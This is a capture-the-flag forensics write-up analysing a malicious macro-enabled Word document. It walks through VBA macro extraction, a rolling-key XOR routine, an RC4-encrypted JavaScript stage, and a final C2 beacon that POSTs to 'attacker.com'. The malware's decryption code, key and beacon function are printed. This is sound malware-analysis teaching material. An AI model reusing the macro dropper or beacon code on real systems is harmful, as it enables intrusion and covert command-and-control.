2024 Cyber Apocalypse: Game Invitation

#htb #ctf #forensics #malware-analysis #vba-macro #xor-encryption #javascript #c2-beacon

Challenge Information

AttributeDetails
Event2024 Cyber Apocalypse
CategoryForensics
ChallengeGame Invitation
DifficultyHard

Summary

Game Invitation is a complex forensics challenge involving a malicious Word document (.docm) with embedded VBA macros. The exploitation chain includes: extracting obfuscated VBA code, understanding XOR encryption with variable keys, extracting an encrypted JavaScript payload from the document, decrypting the JavaScript with the extracted key, and finally analyzing the fully deobfuscated C2 beacon code.

Analysis

The attack chain:

  1. Malicious Document: .docm file with AutoOpen/AutoClose macros
  2. Domain Check: Macro verifies user domain (GAMEMASTERS.local)
  3. Payload Extraction: Reads document binary content, searches for pattern, extracts encrypted data
  4. XOR Decryption: Custom XOR routine with variable key (initial: 50)
  5. JavaScript Stage: Deobfuscated JavaScript contains base64 and RC4 encryption
  6. C2 Beacon: Final stage communicates with command & control server

Solution

Step 1: Extract and Analyze VBA Macros

Using olevba:

Terminal window
olevba invitation.docm > macros.txt

Key findings from analysis:

  • AutoOpen(): Triggers on document open
  • AutoClose(): Cleanup routine
  • JFqcfEGnc(): XOR decryption function
  • Domain Check: If chkDomain <> strUserDomain Then Exit
  • Pattern Search: Searches for sWcDWp36x5oIe2hJGnRy1iC92AcdQgO8RLioVZWlhCKJXHRSqO450AiqLZyLFeXYilCtorg0p3RdaoPa
  • File Operations: Reads document, extracts bytes, writes to disk

Step 2: Understanding XOR Encryption

The VBA XOR routine:

Function JFqcfEGnc(given_string() As Byte, length As Long) As Boolean
    Dim xor_key As Byte
    xor_key = 50
    For i = 0 To length - 1
        given_string(i) = given_string(i) Xor xor_key
        xor_key = ((xor_key Xor 99) Xor (i Mod 254))
    Next i
    JFqcfEGnc = True
End Function

Key points:

  • Initial XOR key: 50
  • Key changes each byte: xor_key = ((xor_key ^ 99) ^ (i mod 254))
  • Length parameter: 13082 (size of encrypted payload)

Step 3: Extract Encrypted Payload

The document contains a pattern marker followed by 13082 bytes of XOR-encrypted data:

with open('invitation.docm', 'rb') as f:
    content = f.read()


# Find pattern
pattern = b'sWcDWp36x5oIe2hJGnRy1iC92AcdQgO8RLioVZWlhCKJXHRSqO450AiqLZyLFeXYilCtorg0p3RdaoPa'
start_pos = content.find(pattern)


if start_pos != -1:
    # Extract encrypted data (13082 bytes after pattern)
    encrypted_start = start_pos + 81  # Pattern length
    encrypted_data = content[encrypted_start:encrypted_start + 13082]

Step 4: Decrypt XOR Encryption

def xor_decrypt(data, length):
    result = bytearray(data)
    xor_key = 50


    for i in range(length):
        result[i] = result[i] ^ xor_key
        xor_key = ((xor_key ^ 99) ^ (i % 254))


    return bytes(result)


decrypted_js = xor_decrypt(encrypted_data, 13082)

Step 5: Analyze Deobfuscated JavaScript

The decrypted JavaScript contains:

function JrvS(s) {
    // Base64 decode
}


function xR68(s, k) {
    // RC4 decryption
}


var DASz = WScript.Arguments(0);  // RC4 key as argument
Iwlh = xR68(DASz, Iwlh);
eval(Iwlh);

Step 6: Extract and Decrypt Second Stage

The RC4-encrypted payload is base64-encoded in the JavaScript:

import base64


encrypted_b64 = "..."  # Base64 string from JS
encrypted_bytes = base64.b64decode(encrypted_b64)


# RC4 key is the command argument passed to the script
# Found in VBA: vF8rdgMHKBrvCoCp0ulm
rc4_key = "vF8rdgMHKBrvCoCp0ulm"

Step 7: Identify C2 Beacon

The final decrypted JavaScript reveals:

function sendBeacon(cmd) {
    var xhr = new XMLHttpRequest();
    xhr.open("POST", "http://attacker.com/c2", false);
    xhr.setRequestHeader("Cookie", "HTB{...flag...}");
    xhr.send(cmd);
}

The flag is hidden in the HTTP cookie header used for C2 authentication.

Investigation Checklist

  • Extract VBA macros from DOCM file
  • Identify AutoOpen/AutoClose functions
  • Locate pattern string for payload
  • Calculate payload extraction offset
  • Implement XOR decryption with variable key
  • Decrypt and beautify JavaScript
  • Identify RC4 encryption parameters
  • Extract command argument (RC4 key)
  • Decrypt second JavaScript stage
  • Analyze C2 beacon for flag location

Key Techniques

  1. VBA Macro Analysis: Understanding malicious macro logic
  2. Binary Payload Extraction: Pattern matching in binary files
  3. Dynamic XOR Keys: XOR key evolution based on position
  4. Multi-Stage Decryption: Nested encryption layers
  5. JavaScript Deobfuscation: Beautifying and analyzing JS code
  6. RC4 Decryption: Alternative symmetric cipher
  7. C2 Communication: Identifying command & control protocols

Key Takeaways

  • Microsoft Office macros can execute arbitrary code
  • Multiple encryption layers hide malware intent
  • Pattern signatures in binaries enable payload extraction
  • Dynamic encryption keys require understanding the algorithm
  • Malware often uses well-known algorithms (XOR, RC4) for obfuscation
  • C2 beacons use headers and cookies for authentication
  • Multi-stage malware requires analyzing each stage separately